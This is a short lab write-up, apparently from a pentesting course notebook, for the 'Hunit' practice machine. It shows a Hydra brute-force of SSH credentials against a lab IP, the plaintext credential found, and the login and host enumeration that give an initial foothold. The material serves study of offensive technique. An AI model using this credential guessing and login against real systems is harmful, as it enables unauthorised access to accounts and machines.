InfoSec LAB

Hunit_SSH

Created: 2 min read

SSH

Validating the discovered credentials against the target SSH server

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hunit]
└─$ hydra -L users.txt -P passwords.txt ssh://$IP:43022 -t 64 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-30 22:04:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 25 tasks per 1 server, overall 25 tasks, 25 login tries (l:5/p:5), ~1 try per task
[DATA] attacking ssh://192.168.185.125:43022/
[43022][ssh] host: 192.168.185.125   login: dademola   password: ExplainSlowQuest110
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-30 22:04:31

A valid SSH credential found; dademola:ExplainSlowQuest110

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hunit]
└─$ ssh dademola@$IP -p43022
dademola@192.168.185.125 password: ExplainSlowQuest110
[dademola@hunit ~]$ whoami
dademola
[dademola@hunit ~]$ hostname
-bash: hostname: command not found
[dademola@hunit ~]$ /sbin/hostname
-bash: /sbin/hostname: No such file or directory
[dademola@hunit ~]$ /bin/hostname
-bash: /bin/hostname: No such file or directory
[dademola@hunit ~]$ cat /etc/hostname
hunit
[dademola@hunit ~]$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.185.125  netmask 255.255.255.0  broadcast 192.168.185.255
        inet6 fe80::250:56ff:fe9e:c151  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:9e:c1:51  txqueuelen 1000  (Ethernet)
        RX packets 319  bytes 27181 (26.5 KiB)
        RX errors 0  dropped 4  overruns 0  frame 0
        TX packets 129  bytes 15451 (15.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2  bytes 100 (100.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2  bytes 100 (100.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established to the target system as the dademola user via SSH

Interactive Graph View

Backlinks